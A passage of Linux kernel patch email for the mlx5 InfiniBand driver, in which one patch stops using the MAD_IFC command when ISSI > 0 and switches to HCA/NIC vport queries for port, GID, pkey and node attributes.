mlx5_core_dev *dev, int *max_mtu, u8 local_port); int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu, u8 local_port); +int mlx5_query_port_vl_hw_cap(struct mlx5_core_dev *dev, + u8 *vl_hw_cap, u8 local_port); int mlx5_debug_eq_add(struct mlx5_core_dev *dev, struct mlx5_eq *eq); void mlx5_debug_eq_remove(struct mlx5_core_dev *dev, struct mlx5_eq *eq); From 1b5daf11b015123108686a9060ee6de705a03e76 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:46 +0300 Subject: [PATCH 717/872] IB/mlx5: Avoid using the MAD_IFC command under ISSI > 0 mode In ISSI > 0 mode, most of the MAD_IFC command features are deprecated, and can't be used. Therefore, when in that mode, we replace all of them with other commands that provide the required functionality. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx5/mad.c | 297 +++++++++++++++ drivers/infiniband/hw/mlx5/main.c | 517 ++++++++++++++++++--------- drivers/infiniband/hw/mlx5/mlx5_ib.h | 16 + 3 files changed, 657 insertions(+), 173 deletions(-) diff --git a/drivers/infiniband/hw/mlx5/mad.c b/drivers/infiniband/hw/mlx5/mad.c index f2d9e70818d7..a770490ebbf1 100644 --- a/drivers/infiniband/hw/mlx5/mad.c +++ b/drivers/infiniband/hw/mlx5/mad.c @@ -137,3 +137,300 @@ int mlx5_query_ext_port_caps(struct mlx5_ib_dev *dev, u8 port) kfree(out_mad); return err; } + +int mlx5_query_mad_ifc_smp_attr_node_info(struct ib_device *ibdev, + struct ib_smp *out_mad) +{ + struct ib_smp *in_mad = NULL; + int err = -ENOMEM; + + in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); + if (!in_mad) + return -ENOMEM; + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_NODE_INFO; + + err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, 1, NULL, NULL, in_mad, + out_mad); + + kfree(in_mad); + return err; +} + +int mlx5_query_mad_ifc_system_image_guid(struct ib_device *ibdev, + __be64 *sys_image_guid) +{ + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!out_mad) + return -ENOMEM; + + err = mlx5_query_mad_ifc_smp_attr_node_info(ibdev, out_mad); + if (err) + goto out; + + memcpy(sys_image_guid, out_mad->data + 4, 8); + +out: + kfree(out_mad); + + return err; +} + +int mlx5_query_mad_ifc_max_pkeys(struct ib_device *ibdev, + u16 *max_pkeys) +{ + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!out_mad) + return -ENOMEM; + + err = mlx5_query_mad_ifc_smp_attr_node_info(ibdev, out_mad); + if (err) + goto out; + + *max_pkeys = be16_to_cpup((__be16 *)(out_mad->data + 28)); + +out: + kfree(out_mad); + + return err; +} + +int mlx5_query_mad_ifc_vendor_id(struct ib_device *ibdev, + u32 *vendor_id) +{ + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!out_mad) + return -ENOMEM; + + err = mlx5_query_mad_ifc_smp_attr_node_info(ibdev, out_mad); + if (err) + goto out; + + *vendor_id = be32_to_cpup((__be32 *)(out_mad->data + 36)) & 0xffff; + +out: + kfree(out_mad); + + return err; +} + +int mlx5_query_mad_ifc_node_desc(struct mlx5_ib_dev *dev, char *node_desc) +{ + struct ib_smp *in_mad = NULL; + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!in_mad || !out_mad) + goto out; + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_NODE_DESC; + + err = mlx5_MAD_IFC(dev, 1, 1, 1, NULL, NULL, in_mad, out_mad); + if (err) + goto out; + + memcpy(node_desc, out_mad->data, 64); +out: + kfree(in_mad); + kfree(out_mad); + return err; +} + +int mlx5_query_mad_ifc_node_guid(struct mlx5_ib_dev *dev, __be64 *node_guid) +{ + struct ib_smp *in_mad = NULL; + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!in_mad || !out_mad) + goto out; + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_NODE_INFO; + + err = mlx5_MAD_IFC(dev, 1, 1, 1, NULL, NULL, in_mad, out_mad); + if (err) + goto out; + + memcpy(node_guid, out_mad->data + 12, 8); +out: + kfree(in_mad); + kfree(out_mad); + return err; +} + +int mlx5_query_mad_ifc_pkey(struct ib_device *ibdev, u8 port, u16 index, + u16 *pkey) +{ + struct ib_smp *in_mad = NULL; + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!in_mad || !out_mad) + goto out; + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_PKEY_TABLE; + in_mad->attr_mod = cpu_to_be32(index / 32); + + err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, port, NULL, NULL, in_mad, + out_mad); + if (err) + goto out; + + *pkey = be16_to_cpu(((__be16 *)out_mad->data)[index % 32]); + +out: + kfree(in_mad); + kfree(out_mad); + return err; +} + +int mlx5_query_mad_ifc_gids(struct ib_device *ibdev, u8 port, int index, + union ib_gid *gid) +{ + struct ib_smp *in_mad = NULL; + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!in_mad || !out_mad) + goto out; + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_PORT_INFO; + in_mad->attr_mod = cpu_to_be32(port); + + err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, port, NULL, NULL, in_mad, + out_mad); + if (err) + goto out; + + memcpy(gid->raw, out_mad->data + 8, 8); + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_GUID_INFO; + in_mad->attr_mod = cpu_to_be32(index / 8); + + err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, port, NULL, NULL, in_mad, + out_mad); + if (err) + goto out; + + memcpy(gid->raw + 8, out_mad->data + (index % 8) * 8, 8); + +out: + kfree(in_mad); + kfree(out_mad); + return err; +} + +int mlx5_query_mad_ifc_port(struct ib_device *ibdev, u8 port, + struct ib_port_attr *props) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; + struct ib_smp *in_mad = NULL; + struct ib_smp *out_mad = NULL; + int ext_active_speed; + int err = -ENOMEM; + + if (port < 1 || port > MLX5_CAP_GEN(mdev, num_ports)) { + mlx5_ib_warn(dev, "invalid port number %d\n", port); + return -EINVAL; + } + + in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!in_mad || !out_mad) + goto out; + + memset(props, 0, sizeof(*props)); + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_PORT_INFO; + in_mad->attr_mod = cpu_to_be32(port); + + err = mlx5_MAD_IFC(dev, 1, 1, port, NULL, NULL, in_mad, out_mad); + if (err) { + mlx5_ib_warn(dev, "err %d\n", err); + goto out; + } + + props->lid = be16_to_cpup((__be16 *)(out_mad->data + 16)); + props->lmc = out_mad->data[34] & 0x7; + props->sm_lid = be16_to_cpup((__be16 *)(out_mad->data + 18)); + props->sm_sl = out_mad->data[36] & 0xf; + props->state = out_mad->data[32] & 0xf; + props->phys_state = out_mad->data[33] >> 4; + props->port_cap_flags = be32_to_cpup((__be32 *)(out_mad->data + 20)); + props->gid_tbl_len = out_mad->data[50]; + props->max_msg_sz = 1 << MLX5_CAP_GEN(mdev, log_max_msg); + props->pkey_tbl_len = mdev->port_caps[port - 1].pkey_table_len; + props->bad_pkey_cntr = be16_to_cpup((__be16 *)(out_mad->data + 46)); + props->qkey_viol_cntr = be16_to_cpup((__be16 *)(out_mad->data + 48)); + props->active_width = out_mad->data[31] & 0xf; + props->active_speed = out_mad->data[35] >> 4; + props->max_mtu = out_mad->data[41] & 0xf; + props->active_mtu = out_mad->data[36] >> 4; + props->subnet_timeout = out_mad->data[51] & 0x1f; + props->max_vl_num = out_mad->data[37] >> 4; + props->init_type_reply = out_mad->data[41] >> 4; + + /* Check if extended speeds (EDR/FDR/...) are supported */ + if (props->port_cap_flags & IB_PORT_EXTENDED_SPEEDS_SUP) { + ext_active_speed = out_mad->data[62] >> 4; + + switch (ext_active_speed) { + case 1: + props->active_speed = 16; /* FDR */ + break; + case 2: + props->active_speed = 32; /* EDR */ + break; + } + } + + /* If reported active speed is QDR, check if is FDR-10 */ + if (props->active_speed == 4) { + if (mdev->port_caps[port - 1].ext_port_cap & + MLX_EXT_PORT_CAP_FLAG_EXTENDED_PORT_INFO) { + init_query_mad(in_mad); + in_mad->attr_id = MLX5_ATTR_EXTENDED_PORT_INFO; + in_mad->attr_mod = cpu_to_be32(port); + + err = mlx5_MAD_IFC(dev, 1, 1, port, + NULL, NULL, in_mad, out_mad); + if (err) + goto out; + + /* Checking LinkSpeedActive for FDR-10 */ + if (out_mad->data[15] & 0x1) + props->active_speed = 8; + } + } + +out: + kfree(in_mad); + kfree(out_mad); + + return err; +} diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c index 9075649f30fc..a117e27b424a 100644 --- a/drivers/infiniband/hw/mlx5/main.c +++ b/drivers/infiniband/hw/mlx5/main.c @@ -40,6 +40,7 @@ #include #include #include +#include #include #include #include "user.h" @@ -62,30 +63,168 @@ static char mlx5_version[] = DRIVER_NAME ": Mellanox Connect-IB Infiniband driver v" DRIVER_VERSION " (" DRIVER_RELDATE ")\n"; +static enum rdma_link_layer +mlx5_ib_port_link_layer(struct ib_device *device) +{ + struct mlx5_ib_dev *dev = to_mdev(device); + + switch (MLX5_CAP_GEN(dev->mdev, port_type)) { + case MLX5_CAP_PORT_TYPE_IB: + return IB_LINK_LAYER_INFINIBAND; + case MLX5_CAP_PORT_TYPE_ETH: + return IB_LINK_LAYER_ETHERNET; + default: + return IB_LINK_LAYER_UNSPECIFIED; + } +} + +static int mlx5_use_mad_ifc(struct mlx5_ib_dev *dev) +{ + return !dev->mdev->issi; +} + +enum { + MLX5_VPORT_ACCESS_METHOD_MAD, + MLX5_VPORT_ACCESS_METHOD_HCA, + MLX5_VPORT_ACCESS_METHOD_NIC, +}; + +static int mlx5_get_vport_access_method(struct ib_device *ibdev) +{ + if (mlx5_use_mad_ifc(to_mdev(ibdev))) + return MLX5_VPORT_ACCESS_METHOD_MAD; + + if (mlx5_ib_port_link_layer(ibdev) == + IB_LINK_LAYER_ETHERNET) + return MLX5_VPORT_ACCESS_METHOD_NIC; + + return MLX5_VPORT_ACCESS_METHOD_HCA; +} + +static int mlx5_query_system_image_guid(struct ib_device *ibdev, + __be64 *sys_image_guid) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; + u64 tmp; + int err; + + switch (mlx5_get_vport_access_method(ibdev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_system_image_guid(ibdev, + sys_image_guid); + + case MLX5_VPORT_ACCESS_METHOD_HCA: + err = mlx5_query_hca_vport_system_image_guid(mdev, &tmp); + if (!err) + *sys_image_guid = cpu_to_be64(tmp); + return err; + + default: + return -EINVAL; + } +} + +static int mlx5_query_max_pkeys(struct ib_device *ibdev, + u16 *max_pkeys) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; + + switch (mlx5_get_vport_access_method(ibdev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_max_pkeys(ibdev, max_pkeys); + + case MLX5_VPORT_ACCESS_METHOD_HCA: + case MLX5_VPORT_ACCESS_METHOD_NIC: + *max_pkeys = mlx5_to_sw_pkey_sz(MLX5_CAP_GEN(mdev, + pkey_table_size)); + return 0; + + default: + return -EINVAL; + } +} + +static int mlx5_query_vendor_id(struct ib_device *ibdev, + u32 *vendor_id) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + + switch (mlx5_get_vport_access_method(ibdev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_vendor_id(ibdev, vendor_id); + + case MLX5_VPORT_ACCESS_METHOD_HCA: + case MLX5_VPORT_ACCESS_METHOD_NIC: + return mlx5_core_query_vendor_id(dev->mdev, vendor_id); + + default: + return -EINVAL; + } +} + +static int mlx5_query_node_guid(struct mlx5_ib_dev *dev, + __be64 *node_guid) +{ + u64 tmp; + int err; + + switch (mlx5_get_vport_access_method(&dev->ib_dev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_node_guid(dev, node_guid); + + case MLX5_VPORT_ACCESS_METHOD_HCA: + err = mlx5_query_hca_vport_node_guid(dev->mdev, &tmp); + if (!err) + *node_guid = cpu_to_be64(tmp); + return err; + + default: + return -EINVAL; + } +} + +struct mlx5_reg_node_desc { + u8 desc[64]; +}; + +static int mlx5_query_node_desc(struct mlx5_ib_dev *dev, char *node_desc) +{ + struct mlx5_reg_node_desc in; + + if (mlx5_use_mad_ifc(dev)) + return mlx5_query_mad_ifc_node_desc(dev, node_desc); + + memset(&in, 0, sizeof(in)); + + return mlx5_core_access_reg(dev->mdev, &in, sizeof(in), node_desc, + sizeof(struct mlx5_reg_node_desc), + MLX5_REG_NODE_DESC, 0, 0); +} + static int mlx5_ib_query_device(struct ib_device *ibdev, struct ib_device_attr *props) { struct mlx5_ib_dev *dev = to_mdev(ibdev); struct mlx5_core_dev *mdev = dev->mdev; - struct ib_smp *in_mad = NULL; - struct ib_smp *out_mad = NULL; int err = -ENOMEM; int max_rq_sg; int max_sq_sg; - in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); - out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); - if (!in_mad || !out_mad) - goto out; - - init_query_mad(in_mad); - in_mad->attr_id = IB_SMP_ATTR_NODE_INFO; + memset(props, 0, sizeof(*props)); + err = mlx5_query_system_image_guid(ibdev, + &props->sys_image_guid); + if (err) + return err; - err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, 1, NULL, NULL, in_mad, out_mad); + err = mlx5_query_max_pkeys(ibdev, &props->max_pkeys); if (err) - goto out; + return err; - memset(props, 0, sizeof(*props)); + err = mlx5_query_vendor_id(ibdev, &props->vendor_id); + if (err) + return err; props->fw_ver = ((u64)fw_rev_maj(dev->mdev) << 32) | (fw_rev_min(dev->mdev) << 16) | @@ -117,11 +256,8 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, if (MLX5_CAP_GEN(mdev, block_lb_mc)) props->device_cap_flags |= IB_DEVICE_BLOCK_MULTICAST_LOOPBACK; - props->vendor_id = be32_to_cpup((__be32 *)(out_mad->data + 36)) & - 0xffffff; - props->vendor_part_id = be16_to_cpup((__be16 *)(out_mad->data + 30)); - props->hw_ver = be32_to_cpup((__be32 *)(out_mad->data + 32)); - memcpy(&props->sys_image_guid, out_mad->data + 4, 8); + props->vendor_part_id = mdev->pdev->device; + props->hw_ver = mdev->pdev->revision; props->max_mr_size = ~0ull; props->page_size_cap = 1ull << MLX5_CAP_GEN(mdev, log_pg_sz); @@ -147,7 +283,6 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, props->max_fast_reg_page_list_len = (unsigned int)-1; props->atomic_cap = IB_ATOMIC_NONE; props->masked_atomic_cap = IB_ATOMIC_NONE; - props->max_pkeys = be16_to_cpup((__be16 *)(out_mad->data + 28)); props->max_mcast_grp = 1 << MLX5_CAP_GEN(mdev, log_max_mcg); props->max_mcast_qp_attach = MLX5_CAP_GEN(mdev, max_qp_mcg); props->max_total_mcast_qp_attach = props->max_mcast_qp_attach * @@ -160,175 +295,232 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, props->odp_caps = dev->odp_caps; #endif -out: - kfree(in_mad); - kfree(out_mad); - - return err; + return 0; } -int mlx5_ib_query_port(struct ib_device *ibdev, u8 port, - struct ib_port_attr *props) +enum mlx5_ib_width { + MLX5_IB_WIDTH_1X = 1 << 0, + MLX5_IB_WIDTH_2X = 1 << 1, + MLX5_IB_WIDTH_4X = 1 << 2, + MLX5_IB_WIDTH_8X = 1 << 3, + MLX5_IB_WIDTH_12X = 1 << 4 +}; + +static int translate_active_width(struct ib_device *ibdev, u8 active_width, + u8 *ib_width) { struct mlx5_ib_dev *dev = to_mdev(ibdev); - struct mlx5_core_dev *mdev = dev->mdev; - struct ib_smp *in_mad = NULL; - struct ib_smp *out_mad = NULL; - int ext_active_speed; - int err = -ENOMEM; + int err = 0; + + if (active_width & MLX5_IB_WIDTH_1X) { + *ib_width = IB_WIDTH_1X; + } else if (active_width & MLX5_IB_WIDTH_2X) { + mlx5_ib_dbg(dev, "active_width %d is not supported by IB spec\n", + (int)active_width); + err = -EINVAL; + } else if (active_width & MLX5_IB_WIDTH_4X) { + *ib_width = IB_WIDTH_4X; + } else if (active_width & MLX5_IB_WIDTH_8X) { + *ib_width = IB_WIDTH_8X; + } else if (active_width & MLX5_IB_WIDTH_12X) { + *ib_width = IB_WIDTH_12X; + } else { + mlx5_ib_dbg(dev, "Invalid active_width %d\n", + (int)active_width); + err = -EINVAL; + } - if (port < 1 || port > MLX5_CAP_GEN(mdev, num_ports)) { - mlx5_ib_warn(dev, "invalid port number %d\n", port); - return -EINVAL; + return err; +} + +static int mlx5_mtu_to_ib_mtu(int mtu) +{ + switch (mtu) { + case 256: return 1; + case 512: return 2; + case 1024: return 3; + case 2048: return 4; + case 4096: return 5; + default: + pr_warn("invalid mtu\n"); + return -1; } +} - in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); - out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); - if (!in_mad || !out_mad) - goto out; +enum ib_max_vl_num { + __IB_MAX_VL_0 = 1, + __IB_MAX_VL_0_1 = 2, + __IB_MAX_VL_0_3 = 3, + __IB_MAX_VL_0_7 = 4, + __IB_MAX_VL_0_14 = 5, +}; - memset(props, 0, sizeof(*props)); +enum mlx5_vl_hw_cap { + MLX5_VL_HW_0 = 1, + MLX5_VL_HW_0_1 = 2, + MLX5_VL_HW_0_2 = 3, + MLX5_VL_HW_0_3 = 4, + MLX5_VL_HW_0_4 = 5, + MLX5_VL_HW_0_5 = 6, + MLX5_VL_HW_0_6 = 7, + MLX5_VL_HW_0_7 = 8, + MLX5_VL_HW_0_14 = 15 +}; - init_query_mad(in_mad); - in_mad->attr_id = IB_SMP_ATTR_PORT_INFO; - in_mad->attr_mod = cpu_to_be32(port); +static int translate_max_vl_num(struct ib_device *ibdev, u8 vl_hw_cap, + u8 *max_vl_num) +{ + switch (vl_hw_cap) { + case MLX5_VL_HW_0: + *max_vl_num = __IB_MAX_VL_0; + break; + case MLX5_VL_HW_0_1: + *max_vl_num = __IB_MAX_VL_0_1; + break; + case MLX5_VL_HW_0_3: + *max_vl_num = __IB_MAX_VL_0_3; + break; + case MLX5_VL_HW_0_7: + *max_vl_num = __IB_MAX_VL_0_7; + break; + case MLX5_VL_HW_0_14: + *max_vl_num = __IB_MAX_VL_0_14; + break; - err = mlx5_MAD_IFC(dev, 1, 1, port, NULL, NULL, in_mad, out_mad); - if (err) { - mlx5_ib_warn(dev, "err %d\n", err); - goto out; + default: + return -EINVAL; } + return 0; +} - props->lid = be16_to_cpup((__be16 *)(out_mad->data + 16)); - props->lmc = out_mad->data[34] & 0x7; - props->sm_lid = be16_to_cpup((__be16 *)(out_mad->data + 18)); - props->sm_sl = out_mad->data[36] & 0xf; - props->state = out_mad->data[32] & 0xf; - props->phys_state = out_mad->data[33] >> 4; - props->port_cap_flags = be32_to_cpup((__be32 *)(out_mad->data + 20)); - props->gid_tbl_len = out_mad->data[50]; - props->max_msg_sz = 1 << MLX5_CAP_GEN(mdev, log_max_msg); - props->pkey_tbl_len = mdev->port_caps[port - 1].pkey_table_len; - props->bad_pkey_cntr = be16_to_cpup((__be16 *)(out_mad->data + 46)); - props->qkey_viol_cntr = be16_to_cpup((__be16 *)(out_mad->data + 48)); - props->active_width = out_mad->data[31] & 0xf; - props->active_speed = out_mad->data[35] >> 4; - props->max_mtu = out_mad->data[41] & 0xf; - props->active_mtu = out_mad->data[36] >> 4; - props->subnet_timeout = out_mad->data[51] & 0x1f; - props->max_vl_num = out_mad->data[37] >> 4; - props->init_type_reply = out_mad->data[41] >> 4; - - /* Check if extended speeds (EDR/FDR/...) are supported */ - if (props->port_cap_flags & IB_PORT_EXTENDED_SPEEDS_SUP) { - ext_active_speed = out_mad->data[62] >> 4; - - switch (ext_active_speed) { - case 1: - props->active_speed = 16; /* FDR */ - break; - case 2: - props->active_speed = 32; /* EDR */ - break; - } - } +static int mlx5_query_hca_port(struct ib_device *ibdev, u8 port, + struct ib_port_attr *props) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; + struct mlx5_hca_vport_context *rep; + int max_mtu; + int oper_mtu; + int err; + u8 ib_link_width_oper; + u8 vl_hw_cap; - /* If reported active speed is QDR, check if is FDR-10 */ - if (props->active_speed == 4) { - if (mdev->port_caps[port - 1].ext_port_cap & - MLX_EXT_PORT_CAP_FLAG_EXTENDED_PORT_INFO) { - init_query_mad(in_mad); - in_mad->attr_id = MLX5_ATTR_EXTENDED_PORT_INFO; - in_mad->attr_mod = cpu_to_be32(port); - - err = mlx5_MAD_IFC(dev, 1, 1, port, - NULL, NULL, in_mad, out_mad); - if (err) - goto out; - - /* Checking LinkSpeedActive for FDR-10 */ - if (out_mad->data[15] & 0x1) - props->active_speed = 8; - } + rep = kzalloc(sizeof(*rep), GFP_KERNEL); + if (!rep) { + err = -ENOMEM; + goto out; } -out: - kfree(in_mad); - kfree(out_mad); + memset(props, 0, sizeof(*props)); - return err; -} + err = mlx5_query_hca_vport_context(mdev, 0, port, 0, rep); + if (err) + goto out; -static int mlx5_ib_query_gid(struct ib_device *ibdev, u8 port, int index, - union ib_gid *gid) -{ - struct ib_smp *in_mad = NULL; - struct ib_smp *out_mad = NULL; - int err = -ENOMEM; + props->lid = rep->lid; + props->lmc = rep->lmc; + props->sm_lid = rep->sm_lid; + props->sm_sl = rep->sm_sl; + props->state = rep->vport_state; + props->phys_state = rep->port_physical_state; + props->port_cap_flags = rep->cap_mask1; + props->gid_tbl_len = mlx5_get_gid_table_len(MLX5_CAP_GEN(mdev, gid_table_size)); + props->max_msg_sz = 1 << MLX5_CAP_GEN(mdev, log_max_msg); + props->pkey_tbl_len = mlx5_to_sw_pkey_sz(MLX5_CAP_GEN(mdev, pkey_table_size)); + props->bad_pkey_cntr = rep->pkey_violation_counter; + props->qkey_viol_cntr = rep->qkey_violation_counter; + props->subnet_timeout = rep->subnet_timeout; + props->init_type_reply = rep->init_type_reply; - in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); - out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); - if (!in_mad || !out_mad) + err = mlx5_query_port_link_width_oper(mdev, &ib_link_width_oper, port); + if (err) goto out; - init_query_mad(in_mad); - in_mad->attr_id = IB_SMP_ATTR_PORT_INFO; - in_mad->attr_mod = cpu_to_be32(port); - - err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, port, NULL, NULL, in_mad, out_mad); + err = translate_active_width(ibdev, ib_link_width_oper, + &props->active_width); + if (err) + goto out; + err = mlx5_query_port_proto_oper(mdev, &props->active_speed, MLX5_PTYS_IB, + port); if (err) goto out; - memcpy(gid->raw, out_mad->data + 8, 8); + err = mlx5_query_port_max_mtu(mdev, &max_mtu, port); + if (err) + goto out; - init_query_mad(in_mad); - in_mad->attr_id = IB_SMP_ATTR_GUID_INFO; - in_mad->attr_mod = cpu_to_be32(index / 8); + props->max_mtu = mlx5_mtu_to_ib_mtu(max_mtu); - err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, port, NULL, NULL, in_mad, out_mad); + err = mlx5_query_port_oper_mtu(mdev, &oper_mtu, port); if (err) goto out; - memcpy(gid->raw + 8, out_mad->data + (index % 8) * 8, 8); + props->active_mtu = mlx5_mtu_to_ib_mtu(oper_mtu); + + err = mlx5_query_port_vl_hw_cap(mdev, &vl_hw_cap, port); + if (err) + goto out; + err = translate_max_vl_num(ibdev, vl_hw_cap, + &props->max_vl_num); out: - kfree(in_mad); - kfree(out_mad); + kfree(rep); return err; } -static int mlx5_ib_query_pkey(struct ib_device *ibdev, u8 port, u16 index, - u16 *pkey) +int mlx5_ib_query_port(struct ib_device *ibdev, u8 port, + struct ib_port_attr *props) { - struct ib_smp *in_mad = NULL; - struct ib_smp *out_mad = NULL; - int err = -ENOMEM; + switch (mlx5_get_vport_access_method(ibdev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_port(ibdev, port, props); - in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); - out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); - if (!in_mad || !out_mad) - goto out; + case MLX5_VPORT_ACCESS_METHOD_HCA: + return mlx5_query_hca_port(ibdev, port, props); - init_query_mad(in_mad); - in_mad->attr_id = IB_SMP_ATTR_PKEY_TABLE; - in_mad->attr_mod = cpu_to_be32(index / 32); + default: + return -EINVAL; + } +} - err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, port, NULL, NULL, in_mad, out_mad); - if (err) - goto out; +static int mlx5_ib_query_gid(struct ib_device *ibdev, u8 port, int index, + union ib_gid *gid) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; - *pkey = be16_to_cpu(((__be16 *)out_mad->data)[index % 32]); + switch (mlx5_get_vport_access_method(ibdev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_gids(ibdev, port, index, gid); + + case MLX5_VPORT_ACCESS_METHOD_HCA: + return mlx5_query_hca_vport_gid(mdev, 0, port, 0, index, gid); + + default: + return -EINVAL; + } -out: - kfree(in_mad); - kfree(out_mad); - return err; } -struct mlx5_reg_node_desc { - u8 desc[64]; -}; +static int mlx5_ib_query_pkey(struct ib_device *ibdev, u8 port, u16 index, + u16 *pkey) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; + + switch (mlx5_get_vport_access_method(ibdev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_pkey(ibdev, port, index, pkey); + + case MLX5_VPORT_ACCESS_METHOD_HCA: + case MLX5_VPORT_ACCESS_METHOD_NIC: + return mlx5_query_hca_vport_pkey(mdev, 0, port, 0, index, + pkey); + default: + return -EINVAL; + } +} static int mlx5_ib_modify_device(struct ib_device *ibdev, int mask, struct ib_device_modify *props) @@ -727,37 +919,15 @@ static int mlx5_ib_mcg_detach(struct ib_qp *ibqp, union ib_gid *gid, u16 lid) static int init_node_data(struct mlx5_ib_dev *dev) { - struct ib_smp *in_mad = NULL; - struct ib_smp *out_mad = NULL; - int err = -ENOMEM; - - in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); - out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); - if (!in_mad || !out_mad) - goto out; - - init_query_mad(in_mad); - in_mad->attr_id = IB_SMP_ATTR_NODE_DESC; - - err = mlx5_MAD_IFC(dev, 1, 1, 1, NULL, NULL, in_mad, out_mad); - if (err) - goto out; - - memcpy(dev->ib_dev.node_desc, out_mad->data, 64); - - in_mad->attr_id = IB_SMP_ATTR_NODE_INFO; + int err; - err = mlx5_MAD_IFC(dev, 1, 1, 1, NULL, NULL, in_mad, out_mad); + err = mlx5_query_node_desc(dev, dev->ib_dev.node_desc); if (err) - goto out; + return err; - dev->mdev->rev_id = be32_to_cpup((__be32 *)(out_mad->data + 32)); - memcpy(&dev->ib_dev.node_guid, out_mad->data + 12, 8); + dev->mdev->rev_id = dev->mdev->pdev->revision; -out: - kfree(in_mad); - kfree(out_mad); - return err; + return mlx5_query_node_guid(dev, &dev->ib_dev.node_guid); } static ssize_t show_fw_pages(struct device *device, struct device_attribute *attr, @@ -1195,7 +1365,8 @@ static void *mlx5_ib_add(struct mlx5_core_dev *mdev) if (err) goto err_dealloc; - get_ext_port_caps(dev); + if (mlx5_use_mad_ifc(dev)) + get_ext_port_caps(dev); MLX5_INIT_DOORBELL_LOCK(&dev->uar_lock); diff --git a/drivers/infiniband/hw/mlx5/mlx5_ib.h b/drivers/infiniband/hw/mlx5/mlx5_ib.h index 0c441add0464..f731b2592a36 100644 --- a/drivers/infiniband/hw/mlx5/mlx5_ib.h +++ b/drivers/infiniband/hw/mlx5/mlx5_ib.h @@ -594,6 +594,22 @@ struct ib_xrcd *mlx5_ib_alloc_xrcd(struct ib_device *ibdev, int mlx5_ib_dealloc_xrcd(struct ib_xrcd *xrcd); int mlx5_ib_get_buf_offset(u64 addr, int page_shift, u32 *offset); int mlx5_query_ext_port_caps(struct mlx5_ib_dev *dev, u8 port); +int mlx5_query_mad_ifc_smp_attr_node_info(struct ib_device *ibdev, + struct ib_smp *out_mad); +int mlx5_query_mad_ifc_system_image_guid(struct ib_device 